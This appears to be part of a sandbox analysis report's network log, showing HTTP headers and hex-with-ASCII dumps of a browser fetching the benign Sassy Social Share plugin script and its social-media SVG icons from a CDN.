                                                                                              2021-12-13 23:57:32 UTC8692INData Raw: 64 28 22 2e 73 75 62 2d 6d 65 6e 75 22 29 2e 62 65 66 6f 72 65 28 68 29 3b 6e 75 6c 6c 21 3d 3d 66 3f 28 68 3d 65 2e 6f 74 68 65 72 73 2e 63 6f 6e 63 61 74 28 66 5b 30 5d 29 2c 62 28 6b 28 68 29 29 2e 62 65 66 6f 72 65 28 64 29 29 3a 62 28 6b 28 65 2e 6f 74 68 65 72 73 29 29 2e 62 65 66 6f 72 65 28 64 29 3b 62 28 22 2e 6d 65 6e 75 2d 74 6f 67 67 6c 65 22 29 2e 61 64 64 43 6c 61 73 73 28 61 29 3b 62 28 22 2e 73 75 62 2d 6d 65 6e 75 2d 74 6f 67 67 6c 65 22 29 2e 61 64 64 43 6c 61 73 73 28 63 29 3b 62 28 22 2e 6d 65 6e 75 2d 74 6f 67 67 6c 65 22 29 2e 6f 6e 28 22 63 6c 69 63 6b 2e 67 65 6e 65 73 69 73 4d 65 6e 75 2d 6d 61 69 6e 62 75 74 74 6f 6e 22 2c 76 29 2e 65 61 63 68 28 75 29 3b 62 28 22 2e 73 75 62 2d 6d 65 6e 75 2d 74 6f 67 67 6c 65 22 29 2e 6f 6e 28
                                                                                              Data Ascii: d(".sub-menu").before(h);null!==f?(h=e.others.concat(f[0]),b(k(h)).before(d)):b(k(e.others)).before(d);b(".menu-toggle").addClass(a);b(".sub-menu-toggle").addClass(c);b(".menu-toggle").on("click.genesisMenu-mainbutton",v).each(u);b(".sub-menu-toggle").on(
                                                                                              2021-12-13 23:57:32 UTC8693INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              26192.168.2.349787104.16.18.94443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2021-12-13 23:57:32 UTC8680OUTGET /js/websetnet.net/wp-content/plugins/sassy-social-share/public/js/sassy-social-share-public.js HTTP/1.1
                                                                                              Accept: application/javascript, */*;q=0.8
                                                                                              Referer: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=google
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: cdn.statically.io
                                                                                              Connection: Keep-Alive
                                                                                              2021-12-13 23:57:32 UTC8693INHTTP/1.1 200 OK
                                                                                              Date: Mon, 13 Dec 2021 23:57:32 GMT
                                                                                              Content-Type: application/javascript
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              CF-Ray: 6bd322a7dfc74309-FRA
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Age: 176186
                                                                                              Cache-Control: public, max-age=31536000, immutable
                                                                                              ETag: W/"00c2c98a7a056b5a7e1ebfbc9795848a6c3f46ab6722972a6ca3ee490ce32f05"
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                              Vary: Accept-Encoding
                                                                                              CF-Cache-Status: HIT
                                                                                              Access-Control-Expose-Headers: *
                                                                                              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                              Timing-Allow-Origin: *
                                                                                              X-BO-LB-Server: LA-155
                                                                                              X-Cache: MISS, HIT
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-Served-By: cache-lga21960-LGA, cache-fra19155-FRA
                                                                                              Server: cloudflare
                                                                                              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                              2021-12-13 23:57:32 UTC8694INData Raw: 37 66 66 32 0d 0a 66 75 6e 63 74 69 6f 6e 20 68 65 61 74 65 6f 72 53 73 73 44 65 74 65 72 6d 69 6e 65 57 68 61 74 73 61 70 70 53 68 61 72 65 41 50 49 28 62 29 7b 69 66 28 62 29 72 65 74 75 72 6e 2d 31 21 3d 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 69 6e 64 65 78 4f 66 28 22 4d 6f 62 69 22 29 3f 22 61 70 69 2e 77 68 61 74 73 61 70 70 2e 63 6f 6d 22 3a 22 77 65 62 2e 77 68 61 74 73 61 70 70 2e 63 6f 6d 22 3b 76 61 72 20 61 3d 6a 51 75 65 72 79 28 22 69 2e 68 65 61 74 65 6f 72 53 73 73 57 68 61 74 73 61 70 70 42 61 63 6b 67 72 6f 75 6e 64 20 61 22 29 2e 61 74 74 72 28 22 68 72 65 66 22 29 3b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 21 3d 3d 61 3f 2d 31 21 3d 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 69 6e 64 65 78 4f 66 28
                                                                                              Data Ascii: 7ff2function heateorSssDetermineWhatsappShareAPI(b){if(b)return-1!=navigator.userAgent.indexOf("Mobi")?"api.whatsapp.com":"web.whatsapp.com";var a=jQuery("i.heateorSssWhatsappBackground a").attr("href");return void 0!==a?-1!=navigator.userAgent.indexOf(
                                                                                              2021-12-13 23:57:32 UTC8695INData Raw: 30 25 22 20 76 69 65 77 42 6f 78 3d 22 2d 34 20 2d 34 20 33 39 20 33 39 22 3e 3c 70 61 74 68 20 64 3d 22 4d 32 38 20 38 2e 35 35 37 61 39 2e 39 31 33 20 39 2e 39 31 33 20 30 20 30 20 31 2d 32 2e 38 32 38 2e 37 37 35 20 34 2e 39 33 20 34 2e 39 33 20 30 20 30 20 30 20 32 2e 31 36 36 2d 32 2e 37 32 35 20 39 2e 37 33 38 20 39 2e 37 33 38 20 30 20 30 20 31 2d 33 2e 31 33 20 31 2e 31 39 34 20 34 2e 39 32 20 34 2e 39 32 20 30 20 30 20 30 2d 33 2e 35 39 33 2d 31 2e 35 35 20 34 2e 39 32 34 20 34 2e 39 32 34 20 30 20 30 20 30 2d 34 2e 37 39 34 20 36 2e 30 34 39 63 2d 34 2e 30 39 2d 2e 32 31 2d 37 2e 37 32 2d 32 2e 31 37 2d 31 30 2e 31 35 2d 35 2e 31 35 61 34 2e 39 34 32 20 34 2e 39 34 32 20 30 20 30 20 30 2d 2e 36 36 35 20 32 2e 34 37 37 63 30 20 31 2e 37 31 2e 38
                                                                                              Data Ascii: 0%" viewBox="-4 -4 39 39"><path d="M28 8.557a9.913 9.913 0 0 1-2.828.775 4.93 4.93 0 0 0 2.166-2.725 9.738 9.738 0 0 1-3.13 1.194 4.92 4.92 0 0 0-3.593-1.55 4.924 4.924 0 0 0-4.794 6.049c-4.09-.21-7.72-2.17-10.15-5.15a4.942 4.942 0 0 0-.665 2.477c0 1.71.8
                                                                                              2021-12-13 23:57:32 UTC8696INData Raw: 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 22 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 76 69 65 77 42 6f 78 3d 22 2d 32 34 20 2d 33 30 20 31 34 30 20 31 36 30 22 3e 3c 67 20 66 69 6c 6c 3d 22 23 66 66 66 22 3e 3c 70 61 74 68 20 64 3d 22 4d 35 38 2e 33 34 20 38 33 2e 33 31 68 2d 32 35 76 2d 38 2e 34 39 63 30 2d 34 2e 35 20 33 2e 36 34 2d 38 2e 31 34 20 38 2e 31 34 2d 38 2e 31 34 68 31 36 2e 38 37 63 31 33 2e 38 20 30 20 32 35 2e 30 32 2d 31 31 2e 31 39 20 32 35 2e 30 32 2d 32 34 2e 39 34 20 30 2d 31 33 2e 37 35 2d 31 31 2e 32 33 2d 32 34 2e 39 34 2d 32 35 2e 30 33 2d 32 34 2e 39 34 68 2d 2e 32 36 6c 2d 35 2e 33 2d 2e 31 36 48 30 43 30 20 37 2e 34 35 20 37 2e 34 35 20 30 20 31 36 2e 36 33 20 30 68 33 36
                                                                                              Data Ascii: ww.w3.org/2000/svg" height="100%" width="100%" viewBox="-24 -30 140 160"><g fill="#fff"><path d="M58.34 83.31h-25v-8.49c0-4.5 3.64-8.14 8.14-8.14h16.87c13.8 0 25.02-11.19 25.02-24.94 0-13.75-11.23-24.94-25.03-24.94h-.26l-5.3-.16H0C0 7.45 7.45 0 16.63 0h36
                                                                                              2021-12-13 23:57:32 UTC8698INData Raw: 76 69 65 77 42 6f 78 3d 22 2d 38 20 2d 35 20 35 30 20 35 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 3c 70 61 74 68 20 64 3d 22 4d 32 34 2e 35 32 38 20 37 2e 39 31 32 35 43 32 34 2e 31 34 36 37 20 38 2e 32 32 31 38 37 20 32 33 2e 37 38 37 34 20 38 2e 33 38 37 35 20 32 33 2e 32 36 35 35 20 38 2e 33 39 36 38 38 43 32 33 2e 37 32 34 39 20 37 2e 39 34 36 38 38 20 32 34 2e 31 34 30 35 20 37 2e 34 33 31 32 35 20 32 34 2e 34 37 38 20 36 2e 38 37 35 43 32 34 2e 38 31 35 35 20 36 2e 33 31 38 37 35 20 32 35 2e 30 37 31 37 20 35 2e 37 31 38 37 35 20 32 35 2e 32 36 32 34 20 35 2e 30 39 33 37 35 43 32 33 2e 36 34 33 36 20 36 2e 33 32 31 38 37 20 32 31 2e 31 35 36
                                                                                              Data Ascii: viewBox="-8 -5 50 50" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M24.528 7.9125C24.1467 8.22187 23.7874 8.3875 23.2655 8.39688C23.7249 7.94688 24.1405 7.43125 24.478 6.875C24.8155 6.31875 25.0717 5.71875 25.2624 5.09375C23.6436 6.32187 21.156
                                                                                              2021-12-13 23:57:32 UTC8699INData Raw: 34 20 31 35 2e 39 38 34 36 20 32 31 2e 36 38 34 36 43 31 35 2e 38 33 37 37 20 32 31 2e 36 39 37 31 20 31 35 2e 37 31 32 37 20 32 31 2e 37 38 31 34 20 31 35 2e 36 35 39 36 20 32 31 2e 39 30 33 33 43 31 35 2e 36 33 37 37 20 32 31 2e 39 34 37 31 20 31 35 2e 36 32 38 33 20 32 31 2e 39 39 33 39 20 31 35 2e 36 32 38 33 20 32 32 2e 30 34 33 39 4c 31 35 2e 37 31 38 39 20 32 34 2e 35 31 38 39 48 31 35 2e 30 33 31 34 43 31 35 2e 30 33 31 34 20 32 34 2e 35 31 35 38 20 31 35 2e 30 33 31 34 20 32 34 2e 35 31 35 38 20 31 35 2e 30 33 31 34 20 32 34 2e 35 31 32 37 4c 31 34 2e 38 37 35 32 20 32 32 2e 30 30 30 32 43 31 34 2e 38 35 36 34 20 32 31 2e 38 30 33 33 20 31 34 2e 36 36 35 38 20 32 31 2e 36 36 32 37 20 31 34 2e 34 34 37 31 20 32 31 2e 36 38 34 36 43 31 34 2e 32 32
                                                                                              Data Ascii: 4 15.9846 21.6846C15.8377 21.6971 15.7127 21.7814 15.6596 21.9033C15.6377 21.9471 15.6283 21.9939 15.6283 22.0439L15.7189 24.5189H15.0314C15.0314 24.5158 15.0314 24.5158 15.0314 24.5127L14.8752 22.0002C14.8564 21.8033 14.6658 21.6627 14.4471 21.6846C14.22
                                                                                              2021-12-13 23:57:32 UTC8700INData Raw: 34 32 20 30 7a 4d 33 2e 36 30 35 20 31 33 2e 37 37 32 63 30 2d 2e 34 37 31 2e 33 37 34 2d 2e 38 35 39 2e 38 35 39 2d 2e 38 35 39 68 2e 31 38 63 2e 33 37 34 20 30 20 2e 36 32 34 2e 31 39 34 2e 37 38 39 2e 34 35 37 6c 32 2e 39 33 35 20 34 2e 35 39 37 20 32 2e 39 35 2d 34 2e 36 31 31 63 2e 31 38 2d 2e 32 39 31 2e 34 33 2d 2e 34 34 33 2e 37 37 34 2d 2e 34 34 33 68 2e 31 38 63 2e 34 38 35 20 30 20 2e 38 35 39 2e 33 38 37 2e 38 35 39 2e 38 35 39 76 38 2e 31 31 33 61 2e 38 34 33 2e 38 34 33 20 30 20 30 20 31 2d 2e 38 35 39 2e 38 34 35 2e 38 35 37 2e 38 35 37 20 30 20 30 20 31 2d 2e 38 34 35 2d 2e 38 34 35 56 31 36 2e 30 37 6c 2d 32 2e 33 36 36 20 33 2e 35 35 39 63 2d 2e 31 38 2e 32 37 36 2d 2e 34 30 32 2e 34 34 33 2d 2e 37 32 2e 34 34 33 2d 2e 33 30 34 20 30 2d
                                                                                              Data Ascii: 42 0zM3.605 13.772c0-.471.374-.859.859-.859h.18c.374 0 .624.194.789.457l2.935 4.597 2.95-4.611c.18-.291.43-.443.774-.443h.18c.485 0 .859.387.859.859v8.113a.843.843 0 0 1-.859.845.857.857 0 0 1-.845-.845V16.07l-2.366 3.559c-.18.276-.402.443-.72.443-.304 0-
                                                                                              2021-12-13 23:57:32 UTC8702INData Raw: 33 35 22 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 66 66 22 20 64 3d 22 4d 31 36 2e 35 33 39 20 34 2e 35 63 2d 36 2e 32 37 37 20 30 2d 39 2e 34 34 32 20 34 2e 35 2d 39 2e 34 34 32 20 38 2e 32 35 33 20 30 20 32 2e 32 37 32 2e 38 36 20 34 2e 32 39 33 20 32 2e 37 30 35 20 35 2e 30 34 36 2e 33 30 33 2e 31 32 35 2e 35 37 34 2e 30 30 35 2e 36 36 32 2d 2e 33 33 2e 30 36 31 2d 2e 32 33 31 2e 32 30 35 2d 2e 38 31 36 2e 32 37 2d 31 2e 30 36 2e 30 38 38 2d 2e 33 33 31 2e 30 35 33 2d 2e 34 34 37 2d 2e 31 39 31 2d 2e 37 33 36 2d 2e 35 33 32 2d 2e 36 32 37 2d 2e 38 37 33 2d 31 2e 34 33 39 2d 2e 38 37 33 2d 32 2e 35 39 31 20 30 2d 33 2e 33 33 38 20 32 2e 34 39 38 2d 36 2e 33 32 37 20 36 2e 35 30 35 2d 36 2e 33 32 37 20 33 2e 35 34 38 20 30 20 35 2e 34 39 37 20 32 2e
                                                                                              Data Ascii: 35"><path fill="#fff" d="M16.539 4.5c-6.277 0-9.442 4.5-9.442 8.253 0 2.272.86 4.293 2.705 5.046.303.125.574.005.662-.33.061-.231.205-.816.27-1.06.088-.331.053-.447-.191-.736-.532-.627-.873-1.439-.873-2.591 0-3.338 2.498-6.327 6.505-6.327 3.548 0 5.497 2.
                                                                                              2021-12-13 23:57:32 UTC8703INData Raw: 37 2e 39 31 36 6c 32 2e 37 37 38 20 32 2e 37 39 63 2e 32 34 33 2e 32 34 33 2e 35 34 38 2e 33 36 34 2e 39 31 37 2e 33 36 34 2e 33 36 20 30 20 2e 36 36 35 2d 2e 31 31 38 2e 39 31 37 2d 2e 33 35 6c 31 2e 39 38 32 2d 31 2e 39 37 63 2e 32 35 32 2d 2e 32 35 2e 33 37 38 2d 2e 35 35 2e 33 37 38 2d 2e 39 7a 6d 2d 39 2e 34 37 37 2d 39 2e 35 30 34 63 30 2d 2e 33 36 2d 2e 31 32 36 2d 2e 36 36 35 2d 2e 33 37 37 2d 2e 39 31 37 6c 2d 32 2e 37 37 37 2d 32 2e 37 39 61 31 2e 32 33 35 20 31 2e 32 33 35 20 30 20 30 20 30 2d 2e 39 31 33 2d 2e 33 37 38 63 2d 2e 33 35 20 30 2d 2e 36 35 36 2e 31 32 2d 2e 39 31 37 2e 33 36 34 4c 37 2e 39 36 37 20 39 2e 39 32 63 2d 2e 32 35 34 2e 32 35 32 2d 2e 33 38 2e 35 35 33 2d 2e 33 38 2e 39 30 33 20 30 20 2e 33 36 2e 31 32 36 2e 36 36 35 2e
                                                                                              Data Ascii: 7.916l2.778 2.79c.243.243.548.364.917.364.36 0 .665-.118.917-.35l1.982-1.97c.252-.25.378-.55.378-.9zm-9.477-9.504c0-.36-.126-.665-.377-.917l-2.777-2.79a1.235 1.235 0 0 0-.913-.378c-.35 0-.656.12-.917.364L7.967 9.92c-.254.252-.38.553-.38.903 0 .36.126.665.
                                                                                              2021-12-13 23:57:32 UTC8704INData Raw: 6d 61 67 65 3d 26 75 70 64 61 74 65 64 3d 26 62 6d 3d 26 75 72 6c 3d 22 2b 61 2b 22 26 74 69 74 6c 65 3d 22 2b 62 2b 22 26 73 65 6c 3d 22 2c 73 76 67 3a 27 3c 73 76 67 20 66 6f 63 75 73 61 62 6c 65 3d 22 66 61 6c 73 65 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 22 20 76 69 65 77 42 6f 78 3d 22 2d 31 20 2d 31 20 33 34 20 33 34 22 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 66 66 22 20 64 3d 22 4d 31 33 2e 34 39 38 20 36 2e 34 39 76 36 2e 32 35 38 6c 2d 35 2e 39 35 33 2d 31 2e 39 33 33 4c 36 20 31 35 2e 35 37 6c 35 2e 39 35 20 31 2e 39 33 34 2d 33 2e 36 37 37
                                                                                              Data Ascii: mage=&updated=&bm=&url="+a+"&title="+b+"&sel=",svg:'<svg focusable="false" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" width="100%" height="100%" viewBox="-1 -1 34 34"><path fill="#fff" d="M13.498 6.49v6.258l-5.953-1.933L6 15.57l5.95 1.934-3.677
                                                                                              2021-12-13 23:57:32 UTC8706INData Raw: 31 2e 31 35 37 2e 38 35 37 2d 2e 30 39 34 2e 32 36 35 2d 2e 31 36 2e 35 36 34 2d 2e 31 36 33 2e 38 38 35 2d 2e 30 31 34 2e 33 38 33 2e 30 33 34 2e 37 34 35 2e 31 36 37 20 31 2e 30 33 38 2e 31 39 36 2e 34 31 38 2e 35 33 2e 36 39 37 20 31 2e 30 34 36 2e 36 39 37 7a 6d 2d 2e 30 31 34 2e 32 39 32 63 2d 2e 32 39 33 20 30 2d 2e 35 34 34 2e 30 32 38 2d 2e 37 36 2e 30 38 34 6c 2e 30 36 33 2e 30 38 34 2e 31 31 2e 32 30 32 2e 30 39 32 2e 32 31 2e 30 37 37 2e 32 31 35 2e 30 35 36 2e 32 32 33 2e 30 33 35 2e 32 32 33 2e 30 32 2e 32 33 2e 30 30 38 2e 32 32 33 76 2e 32 33 37 6c 2d 2e 30 31 34 2e 32 33 2d 2e 30 31 38 2e 32 33 2d 2e 30 32 38 2e 32 33 2d 2e 30 32 38 2e 32 33 2d 2e 30 34 33 2e 32 33 2d 2e 30 34 32 2e 32 33 2d 2e 30 34 2e 32 32 33 2d 2e 30 35 36 2e 32 32 33
                                                                                              Data Ascii: 1.157.857-.094.265-.16.564-.163.885-.014.383.034.745.167 1.038.196.418.53.697 1.046.697zm-.014.292c-.293 0-.544.028-.76.084l.063.084.11.202.092.21.077.215.056.223.035.223.02.23.008.223v.237l-.014.23-.018.23-.028.23-.028.23-.043.23-.042.23-.04.223-.056.223
                                                                                              2021-12-13 23:57:32 UTC8707INData Raw: 32 32 2d 2e 32 36 34 2e 30 36 34 2d 2e 37 32 2e 31 30 36 2d 31 2e 32 35 33 76 2d 2e 30 31 34 6c 2d 2e 30 32 2d 2e 31 38 37 2d 2e 30 32 2d 2e 31 38 38 2d 2e 30 33 2d 2e 31 38 38 2d 2e 30 32 2d 2e 31 38 2d 2e 30 32 2d 2e 31 39 2d 2e 30 33 2d 2e 31 38 2d 2e 30 32 2d 2e 31 38 2d 2e 30 33 2d 2e 31 38 33 2d 2e 30 32 35 2d 2e 31 37 34 2d 2e 30 32 2d 2e 31 36 36 2d 2e 30 33 2d 2e 31 36 37 76 2d 2e 30 32 6c 2d 2e 30 32 2d 2e 31 33 33 2d 2e 30 32 38 2d 2e 31 35 33 2d 2e 30 32 38 2d 2e 31 34 2d 2e 30 32 34 2d 2e 31 33 2d 2e 30 32 38 2d 2e 31 32 35 2d 2e 30 33 2d 2e 31 31 2d 2e 30 33 34 2d 2e 31 38 34 2d 2e 30 35 36 2d 2e 31 38 38 2d 2e 30 34 2d 2e 31 39 36 2d 2e 30 35 38 2d 2e 32 30 33 2d 2e 30 35 36 2d 2e 32 31 2d 2e 30 35 36 2d 2e 32 31 35 2d 2e 30 34 2d 2e 32 32
                                                                                              Data Ascii: 22-.264.064-.72.106-1.253v-.014l-.02-.187-.02-.188-.03-.188-.02-.18-.02-.19-.03-.18-.02-.18-.03-.183-.025-.174-.02-.166-.03-.167v-.02l-.02-.133-.028-.153-.028-.14-.024-.13-.028-.125-.03-.11-.034-.184-.056-.188-.04-.196-.058-.203-.056-.21-.056-.215-.04-.22
                                                                                              2021-12-13 23:57:32 UTC8708INData Raw: 3e 3c 70 61 74 68 20 64 3d 22 4d 32 32 2e 36 36 37 20 31 36 2e 36 36 37 61 31 2e 36 36 37 20 31 2e 36 36 37 20 30 20 31 20 30 20 30 2d 33 2e 33 33 34 20 31 2e 36 36 37 20 31 2e 36 36 37 20 30 20 30 20 30 20 30 20 33 2e 33 33 34 7a 4d 32 32 2e 33 33 33 20 31 38 63 2d 31 2e 39 32 38 20 30 2d 34 20 2e 39 34 36 2d 34 20 32 2e 31 31 37 76 31 2e 32 31 37 68 38 76 2d 31 2e 32 31 37 63 30 2d 31 2e 31 37 2d 32 2e 30 37 32 2d 32 2e 31 31 37 2d 34 2d 32 2e 31 31 37 7a 6d 2d 31 33 2d 31 2e 33 33 33 61 31 2e 36 36 38 20 31 2e 36 36 38 20 30 20 31 20 30 2d 2e 30 30 32 2d 33 2e 33 33 36 20 31 2e 36 36 38 20 31 2e 36 36 38 20 30 20 30 20 30 20 2e 30 30 32 20 33 2e 33 33 36 7a 4d 39 2e 36 36 37 20 31 38 63 2d 31 2e 39 32 38 20 30 2d 34 20 2e 39 34 36 2d 34 20 32 2e 31 31
                                                                                              Data Ascii: ><path d="M22.667 16.667a1.667 1.667 0 1 0 0-3.334 1.667 1.667 0 0 0 0 3.334zM22.333 18c-1.928 0-4 .946-4 2.117v1.217h8v-1.217c0-1.17-2.072-2.117-4-2.117zm-13-1.333a1.668 1.668 0 1 0-.002-3.336 1.668 1.668 0 0 0 .002 3.336zM9.667 18c-1.928 0-4 .946-4 2.11
                                                                                              2021-12-13 23:57:32 UTC8710INData Raw: 64 74 68 3d 22 31 30 30 25 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 33 32 20 33 32 22 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 66 66 22 20 64 3d 22 4d 32 30 2e 37 34 34 20 38 2e 32 31 37 63 31 2e 31 31 32 20 30 20 32 2e 32 39 36 2e 35 31 39 20 33 2e 31 30 36 20 31 2e 33 32 39 6c 2e 31 38 35 2e 31 38 35 63 31 2e 33 36 31 20 31 2e 33 36 31 20 31 2e 34 30 32 20 34 2e 34 33 32 2e 30 34 32 20 35 2e 37 39 32 6c 2d 33 2e 31 30 33 20 32 2e 37 38 37 4c 31 36 20 32 32 2e 37 37 37 6c 2d 34 2e 39 37 34 2d 34 2e 34 36 37 2d 33 2e 31 30 33 2d 32 2e 37 38 37 63 2d 31 2e 33 36 31 2d 31 2e 33 36 31 2d 31 2e 33 31 39 2d 34 2e 34 33 32 2e 30 34 32 2d 35 2e 37 39 32 6c 2e 31 38 35 2d 2e 31 38 35 63 2e 38 31 2d 2e 38 31 20 31
                                                                                              Data Ascii: dth="100%" height="100%" viewBox="0 0 32 32"><path fill="#fff" d="M20.744 8.217c1.112 0 2.296.519 3.106 1.329l.185.185c1.361 1.361 1.402 4.432.042 5.792l-3.103 2.787L16 22.777l-4.974-4.467-3.103-2.787c-1.361-1.361-1.319-4.432.042-5.792l.185-.185c.81-.81 1
                                                                                              2021-12-13 23:57:32 UTC8711INData Raw: 2d 2e 37 35 20 36 2e 36 35 32 2d 32 2e 30 32 39 6c 2d 31 2e 39 38 38 2d 32 2e 32 39 35 7a 22 3e 3c 2f 70 61 74 68 3e 3c 2f 67 3e 3c 2f 73 76 67 3e 27 7d 2c 53 6b 79 70 65 3a 7b 62 61 63 6b 67 72 6f 75 6e 64 5f 63 6f 6c 6f 72 3a 22 23 30 30 61 66 66 30 22 2c 74 69 74 6c 65 3a 22 53 6b 79 70 65 22 2c 72 65 64 69 72 65 63 74 5f 75 72 6c 3a 22 68 74 74 70 73 3a 2f 2f 77 65 62 2e 73 6b 79 70 65 2e 63 6f 6d 2f 73 68 61 72 65 3f 75 72 6c 3d 22 2b 61 2c 73 76 67 3a 27 3c 73 76 67 20 66 6f 63 75 73 61 62 6c 65 3d 22 66 61 6c 73 65 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 68 65 69 67 68 74 3d 22 31 30
                                                                                              Data Ascii: -.75 6.652-2.029l-1.988-2.295z"></path></g></svg>'},Skype:{background_color:"#00aff0",title:"Skype",redirect_url:"https://web.skype.com/share?url="+a,svg:'<svg focusable="false" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" width="100%" height="10
                                                                                              2021-12-13 23:57:32 UTC8712INData Raw: 2e 36 31 38 20 30 20 2e 39 35 20 31 2e 31 36 20 31 2e 32 35 34 20 32 2e 31 37 20 31 2e 34 38 34 6c 32 2e 36 35 2e 35 38 37 63 32 2e 39 30 35 2e 36 34 37 20 33 2e 36 34 20 32 2e 33 34 32 20 33 2e 36 34 20 33 2e 39 34 20 30 20 32 2e 34 37 2d 31 2e 38 39 35 20 34 2e 33 31 38 2d 35 2e 37 32 36 20 34 2e 33 31 38 7a 22 3e 3c 2f 70 61 74 68 3e 3c 2f 73 76 67 3e 27 7d 2c 53 4d 53 3a 7b 62 61 63 6b 67 72 6f 75 6e 64 5f 63 6f 6c 6f 72 3a 22 23 36 65 62 65 34 35 22 2c 74 69 74 6c 65 3a 22 53 4d 53 22 2c 62 6f 6f 6b 6d 61 72 6b 6c 65 74 5f 75 72 6c 3a 22 73 6d 73 3a 3f 26 62 6f 64 79 3d 22 2b 62 2b 22 20 22 2b 61 2c 73 76 67 3a 27 3c 73 76 67 20 66 6f 63 75 73 61 62 6c 65 3d 22 66 61 6c 73 65 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 78 6d 6c 6e
                                                                                              Data Ascii: .618 0 .95 1.16 1.254 2.17 1.484l2.65.587c2.905.647 3.64 2.342 3.64 3.94 0 2.47-1.895 4.318-5.726 4.318z"></path></svg>'},SMS:{background_color:"#6ebe45",title:"SMS",bookmarklet_url:"sms:?&body="+b+" "+a,svg:'<svg focusable="false" aria-hidden="true" xmln
                                                                                              2021-12-13 23:57:32 UTC8714INData Raw: 39 32 34 20 32 2e 34 31 36 2d 31 2e 39 32 34 2e 37 32 20 30 20 31 2e 32 35 2e 31 35 33 20 31 2e 36 33 2e 33 32 33 6c 2d 2e 33 32 32 20 31 2e 31 36 36 61 33 2e 30 33 38 20 33 2e 30 33 38 20 30 20 30 20 30 2d 31 2e 33 33 37 2d 2e 33 30 33 63 2d 2e 36 32 35 20 30 2d 2e 39 33 2e 32 38 34 2d 2e 39 33 2e 36 31 36 20 30 20 2e 34 30 38 2e 33 36 2e 35 38 38 20 31 2e 31 38 36 2e 39 20 31 2e 31 32 37 2e 34 32 20 31 2e 36 35 38 20 31 2e 30 30 36 20 31 2e 36 35 38 20 31 2e 39 30 36 2e 30 30 32 20 31 2e 30 37 2d 2e 38 32 33 20 31 2e 39 38 2d 32 2e 35 37 36 20 31 2e 39 38 7a 22 3e 3c 2f 70 61 74 68 3e 3c 2f 73 76 67 3e 27 7d 2c 54 72 65 6c 6c 6f 3a 7b 62 61 63 6b 67 72 6f 75 6e 64 5f 63 6f 6c 6f 72 3a 22 23 31 31 38 39 63 65 22 2c 74 69 74 6c 65 3a 22 54 72 65 6c 6c 6f
                                                                                              Data Ascii: 924 2.416-1.924.72 0 1.25.153 1.63.323l-.322 1.166a3.038 3.038 0 0 0-1.337-.303c-.625 0-.93.284-.93.616 0 .408.36.588 1.186.9 1.127.42 1.658 1.006 1.658 1.906.002 1.07-.823 1.98-2.576 1.98z"></path></svg>'},Trello:{background_color:"#1189ce",title:"Trello
                                                                                              2021-12-13 23:57:32 UTC8715INData Raw: 32 2e 31 20 31 2e 33 37 20 31 2e 35 35 20 32 2e 39 34 61 35 2e 32 31 20 35 2e 32 31 20 30 20 30 20 31 2d 34 2e 32 39 20 33 2e 32 37 7a 4d 31 37 2e 30 36 20 34 2e 37 39 41 31 30 2e 34 32 20 31 30 2e 34 32 20 30 20 30 20 31 20 32 36 2e 37 39 20 31 35 63 30 20 2e 35 31 2e 31 38 20 31 2e 32 37 2d 2e 35 38 20 31 2e 32 35 73 2d 2e 35 34 2d 2e 37 38 2d 2e 36 2d 31 2e 32 39 63 2d 2e 37 2d 35 2e 35 32 2d 33 2e 32 33 2d 38 2e 31 33 2d 38 2e 37 31 2d 39 2d 2e 34 35 2d 2e 30 37 2d 31 2e 31 35 20 30 2d 31 2e 31 31 2d 2e 35 37 2e 30 35 2d 2e 38 37 2e 38 37 2d 2e 35 34 20 31 2e 32 37 2d 2e 36 7a 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 64 3d 22 